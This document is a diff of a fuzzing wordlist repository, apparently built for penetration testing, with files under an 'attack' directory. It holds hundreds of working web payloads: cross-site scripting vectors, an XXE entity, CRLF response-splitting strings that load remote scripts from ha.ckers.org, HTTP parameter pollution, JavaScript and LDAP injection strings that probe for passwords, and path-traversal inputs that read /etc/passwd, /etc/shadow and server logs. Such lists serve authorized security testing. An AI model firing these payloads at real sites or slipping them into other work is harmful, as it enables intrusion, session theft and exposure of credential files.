<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
|
||||
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
|
||||
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
|
||||
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>
|
||||
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)">]><img />
|
||||
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x></doc>
|
||||
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
|
||||
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
|
||||
<// style=x:expression\28write(1)\29>
|
||||
<form><button formaction="javascript:alert(1)">X</button>
|
||||
<event-source src="event.php" onload="alert(1)">
|
||||
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
|
||||
<script<{alert(1)}/></script </>
|
||||
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
|
||||
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
|
||||
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
|
||||
<object allowscriptaccess="always" data="test.swf"></object>
|
||||
<style>*{x:expression(write(1))}</style>
|
||||
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
|
||||
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
|
||||
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
|
||||
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
|
||||
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
|
||||
<body oninput=alert(1)><input autofocus>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(1)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(1)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/><animate attributeName="onunload" to="alert(1)"/></svg>
|
||||
<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style="background:url(test5.svg)">PRESS ENTER</div>
|
||||
[A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">
|
||||
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
|
||||
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
|
||||
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
|
||||
<!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>
|
||||
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
||||
XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red} /* all UA */*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */</style>
|
||||
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
|
||||
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
|
||||
<img src="x` `<script>alert(1)</script>"` `>
|
||||
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>
|
||||
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
|
||||
<img src onerror /" '"= alt=alert(1)//">
|
||||
<title onpropertychange=alert(1)></title><title title=></title>
|
||||
<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>
|
||||
<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>
|
||||
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
|
||||
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
|
||||
<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>
|
||||
<x style="background:url('x[a];color:red;/*')">XXX</x>
|
||||
<!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(2)//]> -->
|
||||
<div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
|
||||
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe></a>
|
||||
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe>
|
||||
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea>
|
||||
<script>function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); }}</script><body><a href="#" onclick="makePopups()">Spam</a>
|
||||
<html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html>
|
||||
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
|
||||
<span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>
|
||||
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10<script src="\\example.com\foo.js"></script> // Safari 5.0
|
||||
<?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle></svg>
|
||||
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(1)</handler></svg>
|
||||
<svg><style><img/src=x onerror=alert(1)// </b>
|
||||
<svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'><!--Same effect with<image filter='...'>--></svg>
|
||||
<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>
|
||||
<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
|
||||
<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg>
|
||||
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
||||
<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>
|
||||
<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet>
|
||||
<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>
|
||||
<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /></a>
|
||||
<isindex type=image src=1 onerror=alert(1)>
|
||||
<isindex action=javascript:alert(1) type=image>
|
||||
<object data="javascript:alert(0)">
|
||||
<img src=x:alert(alt) onerror=eval(src) alt=0>
|
||||
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
|
115
attack/html_js_fuzz/html_tags.txt
Normal file
115
attack/html_js_fuzz/html_tags.txt
Normal file
|
@ -0,0 +1,115 @@
|
|||
<!-- -->
|
||||
<!DOCTYPE>
|
||||
<a>
|
||||
<abbr>
|
||||
<acronym>
|
||||
<address>
|
||||
<applet>
|
||||
<area>
|
||||
<article>
|
||||
<aside>
|
||||
<audio>
|
||||
<b>
|
||||
<base>
|
||||
<basefont>
|
||||
<bdo>
|
||||
<big>
|
||||
<blockquote>
|
||||
<body>
|
||||
<br>
|
||||
<button>
|
||||
<canvas>
|
||||
<caption>
|
||||
<center>
|
||||
<cite>
|
||||
<code>
|
||||
<col>
|
||||
<colgroup>
|
||||
<command>
|
||||
<datalist>
|
||||
<dd>
|
||||
<del>
|
||||
<details>
|
||||
<dfn>
|
||||
<dir>
|
||||
<div>
|
||||
<dl>
|
||||
<dt>
|
||||
<em>
|
||||
<embed>
|
||||
<fieldset>
|
||||
<figcaption>
|
||||
<figure>
|
||||
<font>
|
||||
<footer>
|
||||
<form>
|
||||
<frame>
|
||||
<frameset>
|
||||
<h1>
|
||||
<head>
|
||||
<header>
|
||||
<hgroup>
|
||||
<hr>
|
||||
<html>
|
||||
<i>
|
||||
<iframe>
|
||||
<img>
|
||||
<input>
|
||||
<ins>
|
||||
<keygen>
|
||||
<kbd>
|
||||
<label>
|
||||
<legend>
|
||||
<li>
|
||||
<link>
|
||||
<map>
|
||||
<mark>
|
||||
<menu>
|
||||
<meta>
|
||||
<meter>
|
||||
<nav>
|
||||
<noframes>
|
||||
<noscript>
|
||||
<object>
|
||||
<ol>
|
||||
<optgroup>
|
||||
<option>
|
||||
<output>
|
||||
<p>
|
||||
<param>
|
||||
<pre>
|
||||
<progress>
|
||||
<q>
|
||||
<rp>
|
||||
<rt>
|
||||
<ruby>
|
||||
<s>
|
||||
<samp>
|
||||
<script>
|
||||
<section>
|
||||
<select>
|
||||
<small>
|
||||
<source>
|
||||
<span>
|
||||
<strike>
|
||||
<strong>
|
||||
<style>
|
||||
<sub>
|
||||
<summary>
|
||||
<sup>
|
||||
<table>
|
||||
<tbody>
|
||||
<td>
|
||||
<textarea>
|
||||
<tfoot>
|
||||
<th>
|
||||
<thead>
|
||||
<time>
|
||||
<title>
|
||||
<tr>
|
||||
<tt>
|
||||
<u>
|
||||
<ul>
|
||||
<var>
|
||||
<video>
|
||||
<xmp>
|
74
attack/html_js_fuzz/javascript_events.txt
Normal file
74
attack/html_js_fuzz/javascript_events.txt
Normal file
|
@ -0,0 +1,74 @@
|
|||
onafterprint
|
||||
onbeforeprint
|
||||
onbeforeonload
|
||||
onblur
|
||||
onerror
|
||||
onfocus
|
||||
onhaschange
|
||||
onload
|
||||
onmessage
|
||||
onoffline
|
||||
ononline
|
||||
onpagehide
|
||||
onpageshow
|
||||
onpopstate
|
||||
onredo
|
||||
onresize
|
||||
onstorage
|
||||
onundo
|
||||
onunload
|
||||
onblur
|
||||
onchange
|
||||
oncontextmenu
|
||||
onfocus
|
||||
onformchange
|
||||
onforminput
|
||||
oninput
|
||||
oninvalid
|
||||
onreset
|
||||
onselect
|
||||
onsubmit
|
||||
onkeydown
|
||||
onkeypress
|
||||
onkeyup
|
||||
onclick
|
||||
ondblclick
|
||||
ondrag
|
||||
ondragend
|
||||
ondragenter
|
||||
ondragleave
|
||||
ondragover
|
||||
ondragstart
|
||||
ondrop
|
||||
onmousedown
|
||||
onmousemove
|
||||
onmouseout
|
||||
onmouseover
|
||||
onmouseup
|
||||
onmousewheel
|
||||
onscroll
|
||||
onabort
|
||||
oncanplay
|
||||
oncanplaythrough
|
||||
ondurationchange
|
||||
onemptied
|
||||
onended
|
||||
onerror
|
||||
onloadeddata
|
||||
onloadedmetadata
|
||||
onloadedstart
|
||||
onpause
|
||||
onplay
|
||||
onplaying
|
||||
onprogress
|
||||
onratechange
|
||||
onreadystatechange
|
||||
onseeked
|
||||
onseeking
|
||||
onstalled
|
||||
onsuspend
|
||||
ontimeupdate
|
||||
onvolumechange
|
||||
onwaiting
|
||||
style
|
||||
|
10
attack/html_js_fuzz/js_inject.txt
Normal file
10
attack/html_js_fuzz/js_inject.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
function(){ return this.userid}
|
||||
' function(){ return this.username} or '1'='1
|
||||
function(){return version()}
|
||||
function(){return version}
|
||||
t'; return this; var d='!
|
||||
" function(){ return this} or '1'='1
|
||||
t"; return this; var d='!
|
||||
' || this || '1'=='1
|
||||
' || this.version || '1'=='1
|
||||
' || '1'=='1
|
20
attack/http-protocol/crlf-injection.txt
Normal file
20
attack/http-protocol/crlf-injection.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
%0d%0a
|
||||
%0d%0a%0d%0a
|
||||
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
|
||||
%0d%0d%0a%0a
|
||||
0x0D0x0A
|
||||
0x0D0x0D0x0A0x0A
|
||||
\r\n
|
||||
%5cr%5cn
|
||||
%0%0d%0ad%0%0d%0aa
|
||||
%0%0D%0AD%0%0D%0AA
|
||||
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
|
||||
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
|
||||
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
|
||||
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
|
||||
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
|
||||
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
|
||||
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
|
||||
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
|
||||
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
|
||||
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
|
38
attack/http-protocol/hpp.txt
Normal file
38
attack/http-protocol/hpp.txt
Normal file
|
@ -0,0 +1,38 @@
|
|||
# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
|
||||
?id=id=1
|
||||
&id=1?id=2
|
||||
?id['&id=1']=2
|
||||
?id[1&id=2]=1
|
||||
?id=1&id=2
|
||||
&id=1&id=2
|
||||
?id=1%26id%3D2
|
||||
?id&id=1
|
||||
????id=1
|
||||
&&&&id=1
|
||||
?id=id['1']=2
|
||||
?id=1#id=2
|
||||
?id==1
|
||||
?id===1
|
||||
;id=1?id=2
|
||||
?id;id=1
|
||||
&id=1;id=2
|
||||
#id=1?id=2&id=3
|
||||
?id=1,2
|
||||
?id1,id2=1
|
||||
?id[=1&id=2]=3
|
||||
?id[&id=2]=1
|
||||
?id=[1,2]
|
||||
?id&=1
|
||||
?id[]=1&id=2
|
||||
?id=/:@&=+$&id=2
|
||||
?id[=/:@&=+$&id=2]=1
|
||||
?id={id:{id:1},2}
|
||||
?id[{id:{id[]:1},2}]=3
|
||||
?id=%23?id=1
|
||||
?id=1%26id=2
|
||||
?id=1%2526id=2
|
||||
?id=1%c0%a6id=2
|
||||
?id=1\uc0a6id=2
|
||||
?id=1&id=2
|
||||
?id=1&id=2
|
||||
?id=1%u0026;id=2
|
148
attack/http-protocol/known-uri-types.txt
Normal file
148
attack/http-protocol/known-uri-types.txt
Normal file
|
@ -0,0 +1,148 @@
|
|||
aaa:
|
||||
aaas:
|
||||
about:
|
||||
acap:
|
||||
adiumxtra:
|
||||
afp:
|
||||
aim:
|
||||
apt:
|
||||
aw:
|
||||
beshare:
|
||||
bitcoin:
|
||||
bolo:
|
||||
callto:
|
||||
cap:
|
||||
chrome:
|
||||
cid:
|
||||
coap:
|
||||
content:
|
||||
crid:
|
||||
cvs:
|
||||
data:
|
||||
dav:
|
||||
dict:
|
||||
dns:
|
||||
doi:
|
||||
ed2k:
|
||||
facetime:
|
||||
fax:
|
||||
feed:
|
||||
file:
|
||||
finger:
|
||||
fish:
|
||||
ftp:
|
||||
geo:
|
||||
gg:
|
||||
git:
|
||||
gizmoproject:
|
||||
go:
|
||||
gopher:
|
||||
gtalk:
|
||||
h323:
|
||||
http:
|
||||
https:
|
||||
iax:
|
||||
icap:
|
||||
im:
|
||||
imap:
|
||||
info:
|
||||
ipp:
|
||||
irc:
|
||||
irc6:
|
||||
ircs:
|
||||
iris.beep:
|
||||
iris.lws:
|
||||
iris.xpcs:
|
||||
iris.xpc:
|
||||
iris:
|
||||
itms:
|
||||
jar:
|
||||
javascript:
|
||||
keyparc:
|
||||
lastfm:
|
||||
ldap:
|
||||
ldaps:
|
||||
lsid:
|
||||
magnet:
|
||||
mailto:
|
||||
maps:
|
||||
market:
|
||||
message:
|
||||
mid:
|
||||
mms:
|
||||
modem:
|
||||
msnim:
|
||||
msrps:
|
||||
msrp:
|
||||
mtqp:
|
||||
mumble:
|
||||
mupdate:
|
||||
mvn:
|
||||
news:
|
||||
nfs:
|
||||
nntp:
|
||||
notes:
|
||||
opaquelocktoken:
|
||||
palm:
|
||||
paparazzi:
|
||||
platform:
|
||||
pop:
|
||||
pres:
|
||||
prospero:
|
||||
proxy:
|
||||
psyc:
|
||||
query:
|
||||
rmi:
|
||||
rsync:
|
||||
rtmp:
|
||||
rtsp:
|
||||
secondlife:
|
||||
service:
|
||||
sftp:
|
||||
sgn:
|
||||
shttp:
|
||||
sieve:
|
||||
sip:
|
||||
sips:
|
||||
skype:
|
||||
smb:
|
||||
sms:
|
||||
snmp:
|
||||
soap.beeps:
|
||||
soap.beep:
|
||||
soldat:
|
||||
spotify:
|
||||
ssh:
|
||||
steam:
|
||||
svn:
|
||||
tag:
|
||||
teamspeak:
|
||||
tel:
|
||||
telnet:
|
||||
tftp:
|
||||
things:
|
||||
thismessage:
|
||||
tip:
|
||||
tv:
|
||||
udp:
|
||||
unreal:
|
||||
urn:
|
||||
ut2004:
|
||||
uuid:
|
||||
vemmi:
|
||||
ventrilo:
|
||||
view-source:
|
||||
wais:
|
||||
webcal:
|
||||
wss:
|
||||
ws:
|
||||
wtai:
|
||||
wyciwyg:
|
||||
xfire:
|
||||
xmlrpc.beeps:
|
||||
xmlrpc.beep :
|
||||
xmpp:
|
||||
xri:
|
||||
ymsgr:
|
||||
z39.50r:
|
||||
z39.50s:
|
89
attack/json/JSON_Fuzzing.txt
Normal file
89
attack/json/JSON_Fuzzing.txt
Normal file
File diff suppressed because one or more lines are too long
28
attack/ldap/ldap-injection.txt
Normal file
28
attack/ldap/ldap-injection.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
!
|
||||
%21
|
||||
%26
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%7C
|
||||
&
|
||||
(
|
||||
)
|
||||
*()|%26'
|
||||
*()|&'
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*)(uid=*))(|(uid=*
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
|
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
admin*)((|userPassword=*)
|
||||
x' or name()='username' or 'x'='y
|
867
attack/lfi/JHADDIX_LFI.txt
Normal file
867
attack/lfi/JHADDIX_LFI.txt
Normal file
|
@ -0,0 +1,867 @@
|
|||
/.../.../.../.../.../
|
||||
\…..\\\…..\\\…..\\\
|
||||
%00../../../../../../etc/passwd
|
||||
%00/etc/passwd%00
|
||||
%00../../../../../../etc/shadow
|
||||
%00/etc/shadow%00
|
||||
%0a/bin/cat%20/etc/passwd
|
||||
%0a/bin/cat%20/etc/shadow
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||
/../../../../../../../../%2A
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
||||
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
|
||||
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
|
||||
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
|
||||
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
|
||||
=3D “/..” . “%2f..
|
||||
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
|
||||
admin/access_log
|
||||
/admin/install.php
|
||||
../../../administrator/inbox
|
||||
/apache2/logs/access_log
|
||||
/apache2/logs/access.log
|
||||
/apache2/logs/error_log
|
||||
/apache2/logs/error.log
|
||||
/apache/logs/access_log
|
||||
/apache/logs/access.log
|
||||
../../../../../apache/logs/access.log
|
||||
../../../../apache/logs/access.log
|
||||
../../../apache/logs/access.log
|
||||
../../apache/logs/access.log
|
||||
../apache/logs/access.log
|
||||
/apache/logs/error_log
|
||||
/apache/logs/error.log
|
||||
../../../../../apache/logs/error.log
|
||||
../../../../apache/logs/error.log
|
||||
../../../apache/logs/error.log
|
||||
../../apache/logs/error.log
|
||||
../apache/logs/error.log
|
||||
/apache\php\php.ini
|
||||
\\'/bin/cat%20/etc/passwd\\'
|
||||
\\'/bin/cat%20/etc/shadow\\'
|
||||
/.bash_history
|
||||
/.bash_profile
|
||||
/.bashrc
|
||||
/../../../../../../../../bin/id|
|
||||
/bin/php.ini
|
||||
/boot/grub/grub.conf
|
||||
/./././././././././././boot.ini
|
||||
/../../../../../../../../../../../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||
..//..//..//..//..//boot.ini
|
||||
../../../../../../../../../../../../boot.ini
|
||||
../../boot.ini
|
||||
..\../..\../..\../..\../boot.ini
|
||||
..\../..\../boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00
|
||||
